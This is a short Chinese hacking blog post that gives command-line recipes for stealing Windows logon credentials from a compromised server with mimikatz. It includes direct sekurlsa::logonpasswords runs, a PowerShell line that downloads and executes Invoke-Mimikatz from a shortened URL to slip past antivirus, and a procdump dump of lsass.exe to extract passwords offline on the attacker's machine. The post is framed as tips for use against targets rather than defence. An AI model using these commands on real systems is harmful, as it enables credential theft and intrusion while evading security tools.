关于mimikatz的玩法(私人技巧)

一条命令抓密码

C:\phpStudy\WWW\mimikatz.exe privilege::debug sekurlsa::logonpasswords

当然如果不回显你可以写入一个文件

C:\phpStudy\WWW\mimikatz.exe privilege::debug sekurlsa::logonpasswords >> C:\phpStudy\WWW\1.txt exit

无文件抓密码

可以躲避过低级的杀软

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

这里有一篇介绍如何免杀的http://www.hackdig.com/01/hack-42525.htm

彻底免杀抓密码

很多情况下有杀软这种瘟神挡道,我们必须另想办法。procdump是微软官方提供的一个小工具,在微软官方有下载

https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx  然后上传相应的版本到目标

C:\phpStudy\WWW\Procdump.exe -accepteula -ma lsass.exe C:\phpStudy\WWW\lsass.dmp

(后缀无法改)然后把lsass.dmp拖到你本机上,记住目标机器的版本号,对应如下

minidump_matrix

举例

  • Dump d’un Windows 2003 => mimikatz x86 运行在 Windows 2003 x86
  • Dump d’un 2008 x64 => mimikatz x64 运行在 Windows 2008 x64

下面本机开始读取密码,用DOS 进入mimikatz ,(双击mimikatz 是不能复制粘贴的)

sekurlsa::minidump lsass.dmp 
sekurlsa::logonPasswords
exit

 

*作者:goldfire,未经授权禁止转载

原创文章,作者:Jarry,如若转载,请注明出处:http://www.mottoin.com/98506.html

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code